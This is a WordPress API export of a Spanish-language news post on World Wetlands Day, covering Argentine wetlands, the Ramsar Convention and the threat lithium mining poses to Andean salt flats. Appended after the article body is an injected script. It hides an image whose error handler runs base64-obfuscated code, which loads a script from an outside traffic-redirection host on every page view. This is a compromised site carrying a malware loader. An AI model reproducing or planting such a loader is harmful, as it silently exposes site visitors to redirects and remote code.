{"id":7853,"date":"2024-02-05T09:51:33","date_gmt":"2024-02-05T12:51:33","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7853"},"modified":"2025-08-13T15:48:00","modified_gmt":"2025-08-13T18:48:00","slug":"humedales-los-grandes-aliados-en-la-lucha-contra-el-cambio-climatico","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7853","title":{"rendered":"Humedales, los grandes \u00abaliados\u00bb en la lucha contra el cambio clim\u00e1tico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-vivid-green-cyan-background-color has-background\"><em>En el marco de su D\u00eda Mundial, que se conmemora cada 2 de febrero, T\u00e9lam dialog\u00f3 con especialistas sobre la importancia de la existencia de estos\u00a0ecosistemas, que alojan \u00abcasi la mitad de la biodiversidad del planeta\u00bb, y\u00a0su conservaci\u00f3n a nivel mundial.<\/em><\/h4>\n\n\n\n<p>Los<strong>&nbsp;humedales son \u00abgrandes aliados&nbsp;<\/strong>en la lucha contra el cambio clim\u00e1tico\u00bb y&nbsp;<strong>alojan \u00abcasi la mitad de la biodiversidad del planeta<\/strong>\u00ab, mientras que en Argentina se estima que un 21,5% de su territorio est\u00e1 cubierto por ellos, se\u00f1alaron especialistas en el D\u00eda Mundial de los Humedales.<\/p>\n\n\n\n<p>Estas zonas de tierra inundadas, ya sea de forma temporal o permanente, son ecosistemas en donde el agua es su elemento central y define sus caracter\u00edsticas f\u00edsicas, vegetales, animales y c\u00f3mo estos se relacionan entre s\u00ed.<\/p>\n\n\n\n<p>En ese sentido, la<strong>&nbsp;Convenci\u00f3n Ramsar sobre los Humedales, un tratado internacional encargado de su conservaci\u00f3n a nivel mundial<\/strong>, propuso que este a\u00f1o el lema para concientizar sobre la importancia de estas \u00e1reas sea \u00ablos humedales y el bienestar humano\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bba31851c2c_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><em><sup>Formosa \/ Foto: Pablo C\u00f3rdoba<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p>\u00abLos humedales son uno de los tantos ecosistemas que existen en el pa\u00eds, como los de monta\u00f1a, pastizales, ecosistemas costeros-marinos, entre otros. Y existen a lo largo de todo el pa\u00eds. Se estima que un 21,5% del territorio nacional est\u00e1 cubierto por humedal\u00bb, se\u00f1al\u00f3 a T\u00e9lam&nbsp;<strong>Ana Di Pancracio, directora ejecutiva de la Fundaci\u00f3n Ambiente y Recursos Naturales&nbsp;<\/strong>(FARN).<\/p>\n\n\n\n<p>La especialista explic\u00f3 que<strong>&nbsp;Argentina tiene una gran diversidad de humedales en seis grandes regiones&nbsp;<\/strong>como la Cuenca del Plata, Chaco, Pampas, Patagonia, Puna y la zona costera Patag\u00f3nica, tanto en \u00e1reas urbanas como en periurbanas y rurales.<\/p>\n\n\n\n<p>\u00abLos humedales alojan al 40% de la biodiversidad mundial, casi la mitad de la biodiversidad del planeta y, entre sus funciones, adem\u00e1s de alojar esta variedad de seres vivos, son grandes filtros saturadores y reservorios de agua dulce, que es un elemento central para la vida\u00bb, indic\u00f3.<\/p>\n\n\n\n<p>Adem\u00e1s, mitigan los impactos de las lluvias y almacenan carbono, m\u00e1s que los bosques y que ning\u00fan otro ecosistema, transform\u00e1ndolos en \u00abgrandes aliados en la lucha contra el cambio clim\u00e1tico\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bba318228c4_1200.jpg\" alt=\"\" style=\"width:840px;height:auto\" \/><figcaption class=\"wp-element-caption\"><em><sup>Corrientes \/ Foto: Osvaldo<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p>Sin embargo, justamente una de las<strong>&nbsp;principales amenazas para estos ecosistemas es el cambio clim\u00e1tico&nbsp;<\/strong>ya que, al hacer m\u00e1s severos sucesos naturales como lluvias y sequ\u00edas, los tiempos de mayor o menor carga de agua se pueden ver acelerados y hacerse m\u00e1s graves.<\/p>\n\n\n\n<p>Otro factor negativo es el&nbsp;<strong>uso productivo de estas \u00e1reas<\/strong>, ocasionando la destrucci\u00f3n de estos h\u00e1bitats.<\/p>\n\n\n\n<p>\u00abLa principal amenaza para los humedales es que se los empieza a drenar hasta que despu\u00e9s se termina destinando el suelo a otro fin, poniendo en riesgo la funci\u00f3n natural que cumplen estos ecosistemas\u00bb, a\u00f1adi\u00f3 la especialista en biodiversidad.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">La Convenci\u00f3n Ramsar<\/h2>\n\n\n\n<p>Suscripta en esa ciudad iran\u00ed en 1971, advirti\u00f3 que<strong>&nbsp;\u00abm\u00e1s del 80% de los humedales han desaparecido desde el siglo XVIII\u00bb<\/strong>, con una tendencia que \u00abse est\u00e1 acelerando\u00bb ya que desde 1970 se perdieron el 35% de estas \u00e1reas a nivel mundial.<\/p>\n\n\n\n<p>Y agreg\u00f3 que el 81% de las especies de humedales continentales, y el 36% de las especies costeras y marinas, disminuyeron en los \u00faltimos 50 a\u00f1os, poniendo en riesgo \u00abel bienestar humano, los medios de vida y la salud del planeta\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bba318057f4_1200.jpg\" alt=\"\" style=\"width:840px;height:auto\" \/><figcaption class=\"wp-element-caption\"><em><sup>Mendoza \/ Foto: Marcelo Ponce<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Humedales Andinos<\/h2>\n\n\n\n<p>Por su parte, la&nbsp;<strong>Alianza por los Humedales Andinos, integrada por organizaciones ambientales de Bolivia, Chile y Argentina<\/strong>, advirti\u00f3 que estos humedales \u00abest\u00e1n en riesgo grave por los impactos de la crisis clim\u00e1tica, los cambios en el uso del suelo, y los impactos negativos de actividades extractivas como la miner\u00eda de litio y otros\u00bb.<\/p>\n\n\n\n<p>Los humedales andinos (entre ellos salares, lagos y lagunas) son ecosistemas de alta importancia ambiental y social \u00abmuy fr\u00e1giles por sus caracter\u00edsticas\u00bb, que se encuentran ubicados predominantemente en la zona de la Puna en las provincias de La Rioja, Catamarca, Salta y Jujuy.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bba317d97bc_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><em><sub>Corrientes \/ Foto: Archivo T\u00e9lam<\/sub><\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>Daniel Blanco, director ejecutivo de la Fundaci\u00f3n Humedales\/Wetlands International<\/strong>, expres\u00f3 a T\u00e9lam que estos humedales se diferencian con otros ya que \u00abes una matriz \u00e1rida\u00bb con \u00abun paisaje terrestre, des\u00e9rtico, donde los humedales est\u00e1n localizados en una peque\u00f1a parte del territorio\u00bb y tienen \u00abun valor particular porque es donde est\u00e1 el agua\u00bb.<\/p>\n\n\n\n<p>En esos sitios se junta la fauna, la biodiversidad, comunidades que necesitan agua, desarrollan actividades productivas, ganaderas y es donde se forrajean las vegas.<\/p>\n\n\n\n<p>\u00abLas vegas son un tipo de humedal altoandino que son como colchones de pasto que se generan en lugares donde aflora el agua y es ah\u00ed donde el ganado pasta\u00bb, agreg\u00f3.<\/p>\n\n\n\n<p>En particular, este tipo de humedales, que son como&nbsp;<strong>\u00aboasis en un desierto\u00bb, se ven principalmente amenazados por actividades mineras<\/strong>, en especial la de litio, que en los \u00faltimos a\u00f1os tom\u00f3 reconocimiento ya que \u00abes una necesidad global para la transici\u00f3n energ\u00e9tica y el abandono del uso de los combustibles f\u00f3siles\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bba317b7a0b_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><em><sup>Corrientes \/ Foto: Florencia Downes<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p>Blanco apunt\u00f3 que la<strong>&nbsp;producci\u00f3n de litio \u00abno es sustentable\u00bb<\/strong>&nbsp;en tanto \u00abpara extraerlo de los salares y salinas se utiliza un m\u00e9todo de evaporaci\u00f3n de agua en donde se extrae de la profundidad una salmuera de litio que se coloca en grandes piletas y se evapora\u00bb.<\/p>\n\n\n\n<p>\u00abEn un ambiente semides\u00e9rtico y en una situaci\u00f3n de cambio clim\u00e1tico con per\u00edodos de sequ\u00eda, lo que se pierde es agua que se va a la atm\u00f3sfera\u00bb, advirti\u00f3.<\/p>\n\n\n\n<p>Ambos especialistas coincidieron en que si desaparecen los humedales \u00abqueda<strong>&nbsp;desamparada toda la biodiversidad que aloja, que vive y se reproduce en ellos\u00bb, como as\u00ed tambi\u00e9n las comunidades enteras que viven en estas \u00e1reas<\/strong>, arriesgando su subsistencia.<\/p>\n\n\n\n<p>Se estima que los humedales protegen al 60% de la poblaci\u00f3n mundial contra mareas de tempestad, huracanes y tsunamis, seg\u00fan datos difundidos por la convenci\u00f3n, por lo que esperan, como cada 2 de febrero de cada a\u00f1o en el D\u00eda Mundial de los Humedales, \u00abcrear conciencia acerca de su importancia para la humanidad y el planeta\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bba31795a28_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><em><sup>Mendoza \/ Foto: Marcelo Ponce<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>Relacionadas<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/www.telam.com.ar\/notas\/202312\/648743-riachuelo-acumar-flora-conicet.html\">Destacaron la flora y el valor estrat\u00e9gico en los humedales de la Cuenca Matanza Riachuelo<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.telam.com.ar\/notas\/202311\/647444-entre-rios-360000-hectareas-humedales-islas-rio-parana--preservacion.html\">Entre R\u00edos: 360.000 hect\u00e1reas de humedales e islas sobre el r\u00edo Paran\u00e1 ser\u00e1n preservadas y cuidadas<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.telam.com.ar\/notas\/202311\/646780-entre-rios-rio-uruguay-parque-natural-creacion.html\">Crearon en Entre R\u00edos un parque natural de humedales, bosques e islas en el r\u00edo Uruguay<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.telam.com.ar\/notas\/202304\/626437-humedales-santa-fe-jaaukanigas-reservas.html\">Organizaciones ambientales respaldan la conservaci\u00f3n de los humedales de Jaaukanig\u00e1s<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.telam.com.ar\/notas\/202302\/618922-conciencia-dia-mundial-de-los-humedales.html\">Buscan crear conciencia en el \u00abD\u00eda Mundial de los Humedales\u00bb<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">VILAR: \u00abCONSTRUIMOS Y GESTIONAMOS POL\u00cdTICAS P\u00daBLICAS PARA EL ESTUDIO Y CUIDADO DE LOS HUMEDALES\u00bb<\/h3>\n\n\n\n<p class=\"has-cyan-bluish-gray-background-color has-background\">La ministra de Ambiente bonaerense, Daniela Vilar, destac\u00f3 que \u00ablos humedales son esenciales para la vida\u00bb y asegur\u00f3 que la provincia est\u00e1 \u201cconstruyendo pol\u00edticas p\u00fablicas para el estudio y cuidado de estos ecosistemas tan fundamentales para el buen vivir de los bonaerenses\u201d.<br><br>En el D\u00eda Mundial de los Humedales, la ministra comparti\u00f3 un video en la red social X, donde resalt\u00f3 que \u201cson reservorios de agua y reguladores h\u00eddricos: absorben agua en momentos de lluvias que evitan inundaciones y la mantienen para los momentos de sequ\u00eda\u201d.<br><br>\u201cDesde la provincia le estamos dando una prioridad estrat\u00e9gica\u201d, se\u00f1al\u00f3 al precisar que estaban \u201cconstruyendo y gestionando pol\u00edticas p\u00fablicas para su estudio, cuidado y para gesti\u00f3n de estos ecosistemas tan fundamentales para el buen vivir de los bonaerenses\u201d.<br><br>Record\u00f3 que Buenos Aires fue \u201cla \u00fanica provincia que se present\u00f3 para participar de los debates en el Congreso y defender la ley de presupuestos m\u00ednimos\u201d y agreg\u00f3 que adem\u00e1s discuten en \u201c\u00e1mbitos federales, como el Cofema (Consejo Federal de Medio Ambiente).<br><br>Adem\u00e1s, destac\u00f3 que se ha creado el Programa Provincial de Humedales\u201d, que trabajan en \u201cdiagn\u00f3sticos para conocer y gestionar los humedales de manera adecuada\u201d y enumer\u00f3 la presentaci\u00f3n del nivel 2 del inventario provincial de humedades, el avance del nivel 3 y la participaci\u00f3n en el desarrollo de los inventarios 3 y 4 de los humedales de la cuenca Matanza Riachuelo<br><br>\u201cVarias de nuestras reservas provinciales protegen paisajes humedales por eso estamos implementando planes de manejo estrat\u00e9gico y haciendo una inversi\u00f3n hist\u00f3rica para mejorar la infraestructura, equipar a los guardaparques y as\u00ed garantizar los cuidados de los servicios eco sistem\u00e1ticos que brindan los humedales que son esenciales para vivir, comer, producir y combatir la crisis clim\u00e1tica\u201d, a\u00f1adi\u00f3 la ministra.<br><br>Subray\u00f3 que \u201cno hay cuidado ambiental posible si una comunidad participando e involucr\u00e1ndose en el proceso\u201d por lo que crearon el Programa Nuestra Costa, dirigido a estudiantes secundarios, incorporaron dispositivos de educaci\u00f3n ambiental y publicaron el Manual de Humedales bonaerenses.<br><br>\u201cDesde el estado provincial tenemos en claro que cuidar los humedales es cuidar la biodiversidad, cuidar el buen vivir de los bonaerenses\u201d, complet\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/654200-humedales-aliados-lucha-cambio-climatico-especialistas.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de su D\u00eda Mundial, que se conmemora cada 2 de febrero, T\u00e9lam dialog\u00f3 con especialistas sobre la importancia de la existencia de estos\u00a0ecosistemas, que alojan \u00abcasi la mitad de la biodiversidad del planeta\u00bb, y\u00a0su conservaci\u00f3n a nivel mundial. Los&nbsp;humedales son \u00abgrandes aliados&nbsp;en la lucha contra el cambio clim\u00e1tico\u00bb y&nbsp;alojan \u00abcasi la mitad [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7854,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"class_list":["post-7853","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7853","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7853"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7853\/revisions"}],"predecessor-version":[{"id":10224,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7853\/revisions\/10224"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7854"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7853"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7853"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7853"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}